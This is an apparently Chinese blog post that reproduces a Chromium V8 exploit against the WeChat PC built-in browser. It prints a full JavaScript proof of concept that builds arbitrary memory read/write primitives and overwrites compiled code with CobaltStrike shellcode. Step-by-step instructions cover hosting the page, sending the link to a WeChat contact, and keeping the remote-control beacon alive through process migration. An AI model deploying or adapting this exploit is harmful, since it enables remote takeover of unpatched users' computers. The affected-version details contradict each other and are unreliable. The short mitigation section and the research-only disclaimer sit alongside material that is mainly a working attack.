复现微信内置浏览器Chrome漏洞实现远控

发布于 2021-09-22  418 次阅读


环境:微信 PC 版 3.2.1.112

利用步骤:

1. 使用 CobaltStrike 生成一个 x86(32 位)格式的 shellcode。注意下方 PoC 以 32 位宽度(getUint32/setUint32)读写指针,硬编码的偏移也只对应 32 位的目标进程,因此 shellcode 必须是 32 位的。

2. 建立一个测试网站,把下方的 PoC 放入页面脚本中,并将 `var shellcode = [shellcode];` 中的占位符替换为第 1 步生成的字节数组(不替换时 shellcode 实际为 [undefined],写入目标的是 0 字节而不是载荷)。文中称其为 0day,但按文末"预防措施"所述,发文时已有修复版本。

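// Configuration flags. Declared with `var` rather than as implicit globals:
// the original bare assignments throw a ReferenceError under strict mode /
// ES modules. ENABLE_LOG gates print(); IN_WORKER is set but never read in
// this listing.
var ENABLE_LOG = true;
var IN_WORKER = true;
// Placeholder: replace `[shellcode]` with the byte array produced in step 1.
// As written it evaluates to [undefined] (hoisted, unassigned `shellcode`),
// so a byte-wise copy of it writes 0x00 bytes, not a payload.
var shellcode = [shellcode];
// Diagnostic output. The original listing stubbed this out, which also
// discarded the exception caught around trigger(), so failures were
// invisible. Logs to console when ENABLE_LOG is truthy; otherwise a no-op.
function print(data) {
  if (ENABLE_LOG && typeof console !== 'undefined' && console.log) {
    console.log(data);
  }
}
// Side-effect sink for target_function: the arithmetic performed on it is
// what gives that function an observable effect (see target_function).
var not_optimised_out = 0;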
// Function whose compiled code becomes the shellcode landing site: trigger()
// leaks this function's address with leakPtr(), reads the code pointer at
// kCodeInsOffset, overwrites that code with `shellcode`, then calls
// target_function(0). The body exists only to have side effects on a global
// (so the engine keeps a real compiled body); the 0xdecaf0 branch is never
// taken during the warm-up below because i stays below 0x10000.
var target_function = (function (value) {
  if (value == 0xdecaf0) {
    not_optimised_out += 1;
  }
  not_optimised_out += 1;
  not_optimised_out |= 0xff;
  not_optimised_out *= 12;
});
// Warm-up: 0x10000 calls so the engine compiles target_function before its
// code pointer is read (presumably to native code; the tier reached is
// build-specific — TODO confirm on the target build).
for (var i = 0; i < 0x10000; ++i) {
  target_function(i);
}
// Assigned by cb() whenever it is called with flag != true (the RegExp
// pattern toString path inside DerivedBase); read there as g_array[8].
var g_array;
// Inheritance depth of the generated DerivedN class chain (19 * 19).
var tDerivedNDepth = 361;
// Number of dead `this.a=0;` statements stamped into each generated
// constructor (17 * 87481 - 8). Both values are tuned for one specific
// engine build — TODO confirm before reuse.
var tDerivedNCount = 1487169;
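// Two parse errors in the pasted listing are repaired here, nothing else in
// the logic is changed: a raw line break inside the "this.a=0;" string
// literal (now written as \n, so the generated text is the same), and the
// non-code residue `End...` that followed the final closing brace.

// RegExp-pattern toString hook used by DerivedBase. With flag == true it is a
// no-op (the cb(true) call in oobAccess); when the RegExp constructor invokes
// it as `pattern.toString()` (no argument) it allocates g_array, stores one
// value at index 0 and returns the pattern text 'c01db33f'.
function cb(flag) {
  if (flag == true) {
    return;
  }
  g_array = new Array(0);
  g_array[0] = 0x1dbabe * 2;
  return 'c01db33f';
}

// Allocation pressure: 0x10000 throw-away String objects, presumably to
// provoke a garbage-collection pass before the class chain is constructed.
// Nothing here forces a GC; it is a heuristic — TODO confirm on the target.
function gc() {
  for (var i = 0; i < 0x10000; ++i) {
    new String();
  }
}

// Builds the arbitrary read/write primitive and returns `this` decorated with
// leakPtr/setPtr/read32/write32/write8/setBytes. It is called as a plain
// function, so `this` is the global object only in sloppy-mode script code;
// under strict mode or in an ES module `this` is undefined and the first
// assignment below throws.
function oobAccess() {
  // Captured for the DerivedBase constructor, where `this` is the instance.
  var this_ = this;
  this.buffer = null;
  this.buffer_view = null;
  this.page_buffer = null;
  this.page_view = null;
  // Spread (as an empty argument list) into every DataView call below;
  // presumably meant to keep those calls from being optimised — TODO confirm.
  this.prevent_opt = [];
  // Offsets into `buffer` at which the LeakArrayBuffer's `slot` property and
  // its backing-store pointer are expected. 32-bit (getUint32) layout; both
  // constants are pinned to one specific engine build.
  var kSlotOffset = 0x1f;
  var kBackingStoreOffset = 0xf;

  // A 0x1000-byte ArrayBuffer carrying an extra `slot` property; whatever is
  // stored in `slot` is what leakPtr() reads the address of.
  class LeakArrayBuffer extends ArrayBuffer {
    constructor() {
      super(0x1000);
      this.slot = this;
    }
  }
  this.page_buffer = new LeakArrayBuffer();
  this.page_view = new DataView(this.page_buffer);

  // Exercise the RegExp(pattern-object) path once with a harmless toString,
  // and cb with its early-return flag, before the real subclass is built.
  new RegExp({ toString: function () { return 'a' } });
  cb(true);

  // RegExp subclass whose super() call re-enters JS through cb (the pattern's
  // toString). After super() returns, a fresh 0x80-byte buffer is allocated
  // and page_buffer is stored into the array cb just created.
  class DerivedBase extends RegExp {
    constructor() {
      super({ toString: cb }, 'g');
      this_.buffer = new ArrayBuffer(0x80);
      g_array[8] = this_.page_buffer;
    }
  }

  // derived_n(i) returns a class i levels below DerivedBase. Every generated
  // constructor does `super(); return;` followed by tDerivedNCount unreachable
  // `this.a=0;` statements — dead code whose only effect is the size of the
  // constructor. The template text is kept byte-for-byte (it is eval'd).
  var derived_n = eval(`(function derived_n(i) {if (i == 0) {return DerivedBase;
}class DerivedN extends derived_n(i-1) {constructor() {super();return;${"this.a=0;\n".repeat(tDerivedNCount)}}}return DerivedN;})`);

  gc();
  // Construct the deepest class: this walks the whole super() chain down to
  // DerivedBase, which runs cb, allocates `buffer` and fills g_array[8].
  new (derived_n(tDerivedNDepth))();
  this.buffer_view = new DataView(this.buffer);

  // Address leak: park obj in page_buffer.slot, then read the 32-bit value at
  // kSlotOffset through `buffer`. This only yields an address if `buffer`'s
  // contents alias the memory holding the LeakArrayBuffer object — the
  // corruption the construction above is meant to produce. Nothing here
  // verifies that it did; a failed setup just returns whatever bytes are at
  // that offset.
  this.leakPtr = function (obj) {
    this.page_buffer.slot = obj;
    return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
  };
  // Point page_buffer's backing store at `addr` by overwriting the pointer at
  // kBackingStoreOffset, so page_view then reads/writes at `addr`.
  this.setPtr = function (addr) {
    this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
  };
  // Arbitrary 32-bit read, 32-bit write and 8-bit write at an absolute address.
  this.read32 = function (addr) {
    this.setPtr(addr);
    return this.page_view.getUint32(0, true, ...this.prevent_opt);
  };
  this.write32 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint32(0, value, true, ...this.prevent_opt);
  };
  this.write8 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint8(0, value, ...this.prevent_opt);
  };
  // Byte-wise copy of `content` to `addr`. Each element goes through
  // setUint8's numeric coercion, so an unreplaced `[shellcode]` placeholder
  // (an undefined element) is written as 0x00.
  this.setBytes = function (addr, content) {
    for (var i = 0; i < content.length; i++) {
      this.write8(addr + i, content[i]);
    }
  };
  return this;
}

// Leak target_function's address, read its code pointer at kCodeInsOffset,
// overwrite the compiled code with `shellcode`, then call the function.
function trigger() {
  var oob = oobAccess();
  var func_ptr = oob.leakPtr(target_function);
  print('[*] target_function at 0x' + func_ptr.toString(16));
  // Offset of the code pointer inside the function object; like the other
  // offsets it is pinned to one 32-bit engine build — TODO confirm.
  var kCodeInsOffset = 0x1b;
  var code_addr = oob.read32(func_ptr + kCodeInsOffset);
  print('[*] code_addr at 0x' + code_addr.toString(16));
  // NOTE(review): neither func_ptr nor code_addr is sanity-checked (non-zero,
  // plausible range) before the write, so a failed leak scribbles the payload
  // at an arbitrary address and crashes the process instead of failing
  // cleanly.
  oob.setBytes(code_addr, shellcode);
  target_function(0);
}

// Entry point. Any exception is caught and routed to print(); if print() is a
// no-op stub (as in the original listing) the failure is silent.
try {
  print("start running");
  trigger();
} catch (e) {
  print(e);
}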

3. 在微信中把该 URL 发给好友,对方在 PC 端用微信内置浏览器打开后即可上线(验证时应只在自己控制的账号与机器之间进行)。

4. 随后即可在 CobaltStrike 中对上线主机执行远控等后续操作。

漏洞原因:微信内置浏览器为 QQ 浏览器,使用 Chrome(Chromium)内核并关闭了沙盒,因此渲染进程中的 V8 漏洞被触发后,写入的 shellcode 直接以浏览器进程的权限执行,不需要额外的沙盒逃逸。

注意:对方关闭该网页(渲染进程退出)后 beacon 会掉线,可通过进程迁移解决。

影响范围:微信 PC 版 3.2.1.141 及以下版本;使用 Chrome 内核 89.0.4389.114 及以下版本的浏览器(Edge、360 浏览器、Google Chrome 等)。注:对开启了沙盒的浏览器,该 PoC 只能在渲染进程内执行代码,要落到系统层面还需要额外的沙盒逃逸;另外原文把 3.2.1.141 同时列为受影响版本和修复版本,确切的版本边界应以官方公告为准。

预防措施:将微信升级到 3.2.1.141 及以上版本,不要点击陌生链接。

截至发稿日期 2021.4.17,微信内核最新版本尚未更新,仍可使用其他方法绕过实现远程控制(本页显示的发布日期晚于该日期,时效性请自行核对)。

本文提供的poc仅供技术研究使用,请勿非法使用。

